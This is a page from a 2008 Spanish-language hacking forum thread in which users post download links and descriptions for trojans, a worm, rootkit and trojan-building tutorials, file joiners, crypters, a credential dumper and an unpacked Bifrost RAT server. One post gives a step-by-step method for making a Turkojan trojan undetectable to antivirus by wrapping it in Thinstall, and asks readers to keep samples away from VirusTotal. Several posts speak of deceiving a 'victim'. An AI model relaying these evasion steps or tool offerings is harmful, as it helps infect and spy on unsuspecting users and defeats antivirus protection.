elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Ingresar Registrarse
11 Octubre 2008, 00:07  



+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Análisis y Diseño de Malware (Moderadores: Man-In-the-Middle, Hendrix)
| | |-+  Contribuciones usuarios elhacker.net
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: 1 2 3 [4] 5 Ir Abajo Imprimir
Autor Tema: Contribuciones usuarios elhacker.net  (Leído 30489 veces)
Krackwar

Desconectado Desconectado

Mensajes: 851


Odio al hombre que rie xD


Ver Perfil
transformer 2.0(bat a exe)
« Respuesta #45 en: 05 Marzo 2008, 04:22 »

bueno haca les dejo mi ultimo imvento es un tranformador de archivos*.bat a *.exe este programa tiene la posibilidad de hacer  que se ejecute el batch de forma oculta o visible aparte de poder bloquiar el regedit , el cmd ,el taskmgr bueno les dejo el link

link=http://rapidshare.com/files/94985485/transformer_2.0_by_krackwar.rar.html
« Última modificación: 06 Marzo 2008, 00:39 por krackwar » En línea

[ìmg]http://img523.imageshack.us/img523/4146/dibujozx1.png [/img]
E0N
Lab &
Colaborador

Desconectado Desconectado

Mensajes: 2.682



Ver Perfil WWW
Querías tutos de programación de malware?? pues toma
« Respuesta #46 en: 08 Marzo 2008, 14:48 »

Queriais tutos para crear vuestro propio malware? Pues aqui teneis una pequeña recopilación de los que he hecho hasta el momento. Dos de ellos ya estaban publicados y el de rootkits se estrena hoy ;)


Crando un rootkit desde cero by E0N:

- Descripción: Explico como funciona un rootkit y como crear el nuestro propio. Tambien explico como hacer inyecciones. Incluye código fuente de un rootkit que oculta carpetas.
- Lenguaje: C/C++

http://personal.telefonica.terra.es/web/alexb/manus/Creando un rootkit desde cero by E0N.rar


Creando un troyano en VB6 y C++ desde cero by E0N

- Descripción: Explico como usar sockets en VB y C/C++ y como utilizarlos para crear nuestro propios troyano de conexión inversa.
- Lenguajes: VB6 (cliente) C/C++ (servidor)


http://personal.telefonica.terra.es/web/alexb/manus/Creando un troyano en VB6 y C++ desde cero by E0N.rar

Creando un Joiner en VB6 desde cero by E0N

- Descripción: Explico como hacer un joiner o binder para unir infinitos archivos.
- Lenguaje: VB6


http://personal.telefonica.terra.es/web/alexb/manus/Creando un Joiner en VB6 desde cero by E0N.rar
En línea
E0N
Lab &
Colaborador

Desconectado Desconectado

Mensajes: 2.682



Ver Perfil WWW
[+] Versión Final: SMALL JOINER by E0N (Joiner Open Source en ASM)
« Respuesta #47 en: 08 Marzo 2008, 14:51 »

SMALL JOINER
Versión final


¿Qué es Small Joiner?

Pues como su nombre indica Small Joiner es un Joiner de tamaño muy pequeño. Para ser exactos su stub, al estar programado en asm, solo ocupa 6kb.
Para q sirve eso?? Pues sirve para que se altere lo menos posible el tamaño del archivo generado por el joiner siendo mucho menos "cantoso" para la "victima".
Ademas es mucho mas rapido que cualkier otro stub programado en C, Delphi o VB ;)
Notareis que el peso a subido ligeramente respecto a la anterior versión, esto a sido necesario para poder activar la opción de camio de icono


Caracteristicas de la versión final:

  • Junta infinitos archivos
  • Se puede elegir ejecutar un archivo o no
  • Se ha añadido un metodo de encriptación para eludir los antivirus. Atención, una vez se hayan separado los archivos los antivirus los detectarán, pero esta opción os puede ser util para añadir como primer archivo un av killer
  • Interfaz mejorada respecto a la anterior versión:

  • Ahora se puede elegir el icno del archivo final. Solo hay que juntar los archivo, darle a cambiar icono y elegir la ruta del ejecutable y la del icono (también podreis cambiar el icono a cualkier otro ejeutable ;))
  • Se puede exportar el archivo en formato exe, com o bat (solo el exe soporta iconos)
  • Se ha añadido un pack con 16 iconos para que se los podais poner al archivo final
  • Por supuesto sigue siendo Open Source, para que veais como funciona



La descarga la teneis abajo. Icluye binarios y codigo fuente (VB6 y FASM).
Para hacerlo funcionar hay que poner SmallJoiner.exe y Stub.dll en la misma ruta

Salu2 y espero comentarios ;)
En línea
endes

Desconectado Desconectado

Mensajes: 135



Ver Perfil
Re: Contribuciones usuarios hacker.net
« Respuesta #48 en: 22 Marzo 2008, 07:05 »

Bien pues aqui dejo mi pequeño aporte ^Ç^

TERROR.exe es una combinacion entre gusano y multiwindows (esta medio raro)

http://rapidshare.com/files/99715436/TERROR.exe

En línea



Krackwar

Desconectado Desconectado

Mensajes: 851


Odio al hombre que rie xD


Ver Perfil
Re: Contribuciones usuarios hacker.net
« Respuesta #49 en: 23 Marzo 2008, 22:23 »

ola,aca les dejo un programa que acabo de hacer bueno aca doi una breve explicacion
OSIRIS 1.0

a quien esta orientado?
bueno,este programa esta orientado a los programadores de batch ya que permite crear bats remotamente con muchas opciones
opciones
  • ejecutar el bat de forma oculta o visible
  • elegir entre 3 opciones en que carpeta se creara el bat estas son system32,tampy windows
  • elegir el nombre del bat
  • editor de server(gracias a EON)
links de descarga
En línea

[ìmg]http://img523.imageshack.us/img523/4146/dibujozx1.png [/img]
Ferсhu

Desconectado Desconectado

Mensajes: 1.221

Menos palabras y Mas codigos.


Ver Perfil WWW
GeMaCrypter Version Beta
« Respuesta #50 en: 27 Marzo 2008, 22:50 »

Hola, les presento a GeMaCrypter, por ahora en la version beta, quizas mas adelante este la version final.

  • Encripta todas las secciones de un ejecutable.
  • Borra la IT original y carga la IAT en tiempo de ejecucion.
  • Agrega una nueva sección con el codigo del crypter.

Hay que aclarar que los datos que no esten definidos como sección no se va a encriptar.

Como es la version beta, algunos archivos quedan corruptos despues de encriptarlos, ya sea por q ya estan empacados, o por que el programa utiliza datos que hay luego de la ultima sección en el header, o etc.


Descargar GeMaCrypter
Código:
http://lawebdeferchu.hyperphp.com/programas/downloads.php?nombre=GeMaCrypter


« Última modificación: 27 Marzo 2008, 22:53 por Adamantyum » En línea

elmeister

Desconectado Desconectado

Mensajes: 60


Ver Perfil
Deja indetectable tu Virus o Troyano en menos de 15 Minutos.
« Respuesta #51 en: 28 Marzo 2008, 12:06 »

Os voy a enseñar el método por el que dejé indetectable el cliente del Turkojan (aunque sirve para cualquiera), lo envié a varios amigos para que lo escanearan, y ninguno lo detectó (se escaneó con Kaspersky, NOD32 v3, BitDefender, Panda, McAfee y Avast).
Lo probé en una máquina virtual, y funcionó, sin haberle pasado Themida ni ningun Crypter.

Es un metodo sencillo, por lo que además de ser útil, es idóneo para los Newbies. Supongo que será más efectivo el metodo de Octalh, pero este resultó ser realmente efectivo y muy fácil de hacer.



Herramientas que se necesitarán:
Troyano o Virus (Yo usé Turkojan 4)
Thinstal Virtualization Suite (Usé la versión 3.350), clic para descargar.



Que es Thinstall?

Es una herramienta que permite crear programas portables, juntando todos los archivos del programa deseado y las claves de registro que crea en un único archivo. Al ser un programa muy usado, los antivirus no lo detectan.



MANUAL:

1: Descargad e instalad Thinstall (el Link está más arriba), aseguraos de tener el cliente del troyano preparado, pero sin haber creado el servidor.

2: Ejecutad el Setup Capture del Thinstall (Lo encontrareis en el Menú inicio), y elegid la unidad en la que vas a guardar el server del troyano (cuando más limpia, mejor, así será más rápido). Yo lo hice en una máquina virtual con la instalación casi limpia. Despues de eso dadle a Pre Install Scan, que leerá la lista de archivos completa del Disco Duro Seleccionado



3-Cuando haya terminado, cread y guardad el server en el Disco duro elegido en el Thinstall, sin cerrar el Thinstall(no creo que haga falta una imagen para esto no? XD), os recomiendo que pongais ahora el icono al archivo si lo quereis camuflar un poco, ya que despues de pasarle el Thinstall, conserva el Icono.

4-Despues, volved al Thinstall, y elegid la opcion Post install Scan, esto escaneará el disco antes elegido en busca de archivos nuevos, además del registro para ver si ha sido modificado.



5-Al terminar, os saldrá una ventana como esta:



Dejad solo marcado el Server del Troyano y dadle a Continue

6-la ventana siguiente podeis dejarla como está:



despues de eso, Thinstall Guardará los archivos necesarios en la carpeta especificada en la ventana anterior, y saldrá esta ventana:



7- Ya casi está, ahora id a la carpeta que habeis especificado en el paso 6, y ejecutad Build.bat



Eso creará una carpeta llamada Bin, en el interior, se encuentra el Troyano indetectable.



Tanto la idea, como el manual ha sido creación mia, si a alguien se le ha ocurrido antes y ha hecho un manual similar, le pido mis disculpas, ya que mi intención no es la de plagiar



NO SUBAIS LOS ARCHIVOS A VIRUSTOTAL, YA QUE PODRIAN ACABAR DETECTANDOLOS, Y NO SOLO NOS JODERIAN A NOSOTROS, SINO A TODOS LOS QUE USAN THINSTALL PARA CREAR VERSIONES PORTABLES DE PROGRAMAS



Tambied decidme con que troyanos y virus lo habeis probado y si funciona o no, para así hacer una lista de troyanos y virus que sean compatibles con este metodo



LISTA DE TROYANOS Y VIRUS COMPATIBLES CON ESTE METODO

  • TURKOJAN 4

LISTA DE TROYANOS NO COMPATIBLES POR EL MOMENTO

  • Bifrost
« Última modificación: 28 Marzo 2008, 22:00 por elmeister » En línea

iron113

Desconectado Desconectado

Mensajes: 7



Ver Perfil WWW
Re: Deja indetectable tu Virus o Troyano en menos de 15 Minutos.
« Respuesta #52 en: 28 Marzo 2008, 16:08 »

escelente buen aporte si señor felicidades tio.saludos :D
En línea

Krackwar

Desconectado Desconectado

Mensajes: 851


Odio al hombre que rie xD


Ver Perfil
Re: Contribuciones usuarios hacker.net
« Respuesta #53 en: 28 Marzo 2008, 18:32 »

bueno , aca les dejo la segunda version:

nuevas caracteristicas:
En línea

[ìmg]http://img523.imageshack.us/img523/4146/dibujozx1.png [/img]
leos_79

Desconectado Desconectado

Mensajes: 179


Anyway, Anyhow, Anywhere


Ver Perfil
Bifrost 1.2.1 SERVER UNPACKED
« Respuesta #54 en: 28 Marzo 2008, 21:55 »

bueno, despues de varias horas de probar experimentos , encontre la cadena que desencripta al server, un par de xor por ahi , y deje que lo desencripte y una vez que lo hice modifique esta cadena para que la xor la haga por 0  , porq ya taba desencriptado , y mi sorpresa fue que quedo funcional y desempacado :D , no se si completamente pero en un 90%,
osea que ya podemos toquetear un poco mas el server :D





http://rapidshare.com/files/103123511/bifrostump.zip.html


mirenlo ustedes mismos con el olly y me cuentan!


saludos espero que les sirva
En línea
Events

Desconectado Desconectado

Mensajes: 960

Cibao 809


Ver Perfil
Lost door v2.1 (troyano)
« Respuesta #55 en: 24 Abril 2008, 17:21 »

Lost door  is a remote administration tool for Microsoft Windows  operating systems.You can control and monitor remote computer easily and view what user  does. Illegal usage of this software is not allowed. Coder and related site is not responsible for any abuse of the software. If you do not accept the terms and   conditions, please do not use the software.





Descarga:

Web Oficial http://www.lostdoor.netfirms.com/

saludos...
En línea

Tughack

Desconectado Desconectado

Mensajes: 498


Ver Perfil
Enumerador de credenciales
« Respuesta #56 en: 06 Mayo 2008, 16:31 »

Bueno, ya lo tenia aki hace un rato, incluso ya lo havia liberado en indetectables.net con un filtro para sacar solo las credenciales del windows live. Este saca todas las credenciales k existan en la makina.

Es una aplicacion consola, puede ser util si la usan como aplicacion externa, pueden usar pipes para leerlo y tal.

Creo k no hace falta decir k para ejecutarla directamente tendran k correr el cmd.exe, cd <ruta del creds.exe> y solo despues ejecutarlo.

www.tughack.net/creds.zip

Saludos
« Última modificación: 06 Mayo 2008, 17:01 por ANELKAOS » En línea
loco5

Desconectado Desconectado

Mensajes: 220


¡Amo YaBB SE!


Ver Perfil WWW
Nueva crypter online
« Respuesta #57 en: 16 Mayo 2008, 15:27 »

hola a todos

aqui os dejo un nuevo crypter online capaz de cryptar ficheros ( hacerles indetectables tambien ) es una version beta y queremos vuestra opinion.

http://rgirardin.mine.nu/beta_packer/V0.1
saludos

webmaster: no pretendo hacer spam ni nda de eso , solo quiero informar
En línea
TheBlackBox

Desconectado Desconectado

Mensajes: 24


Nunca Me Subestimes


Ver Perfil
Ocultar todo tipo de archivos en una foto >:D
« Respuesta #58 en: 16 Mayo 2008, 16:51 »

Un cordial saludo a todos aqui de nuevo otras de mis fatales creaciones >:D



Este programita que cree consiste en hacer una copia binaria de archivos es decir fundir uno con otro añade todo tipo de archivos a una imagen dejandolos totalmente ocultos.



Que ventajas tiene?

  • 1) Funciona mucho mejor que metodos anteriores mas facil y automatizado
  • 2) Deja la foto con poco peso formato totalmente comprimido
  • 3) Formato totalmente oculto y camuflageable
  • 4) De facil utilizacion y entendimiento
  • 5) Indetectable al 100% ya que es codigo binario que viene por defecto en windows
  • 6) No cambia el formato color o tamaño o calidad de la foto se podra ver abrir moficar usar como fondo etc..
  • 7)Muy util si quieren llevar archivos que nadie mas vea solovea una "simple foto"

Recursos que utilizaran Ya viene dentro Su manual de instrucciones:


Mi programa:



7-zip:




PEQUEÑA MUESTRA:
Espero les guste esta facil de usar pero si tienen dudas dejenlas aqui! :xD

Y recuerden AGRADECER NO CUESTA NADA by TheBlackBox!! >:D :xD
« Última modificación: 16 Mayo 2008, 17:03 por TheBlackBox » En línea

alexkof158

Desconectado Desconectado

Mensajes: 176



Ver Perfil
Re: Nueva crypter online
« Respuesta #59 en: 17 Mayo 2008, 07:55 »

hola a todos

aqui os dejo un nuevo crypter online capaz de cryptar ficheros ( hacerles indetectables tambien ) es una version beta y queremos vuestra opinion.

http://rgirardin.mine.nu/beta_packer/V0.1
saludos

webmaster: no pretendo hacer spam ni nda de eso , solo quiero informar
nada, no funka haciendo indetectable ante el bifrost, porque? con que serves haz logrado eso??
En línea

@L3x
Páginas: 1 2 3 [4] 5 Ir Arriba Imprimir 
Ir a:  







Consolas     La Web de Goku     MilW0rm     MundoDivx

Hispabyte     Truzone     TodoReviews     ZonaPhotoshop

hard-h2o modding    Foros de ayuda    Yashira.org    Videojuegos    indetectables.net   

Noticias Informatica    Seguridad Informática    ADSL    Foros en español    eNYe Sec

Todas las webs afiliadas están libres de publicidad engañosa.

Powered by SMF 1.1.6 | SMF © 2006-2008, Simple Machines LLC
Free counter and web stats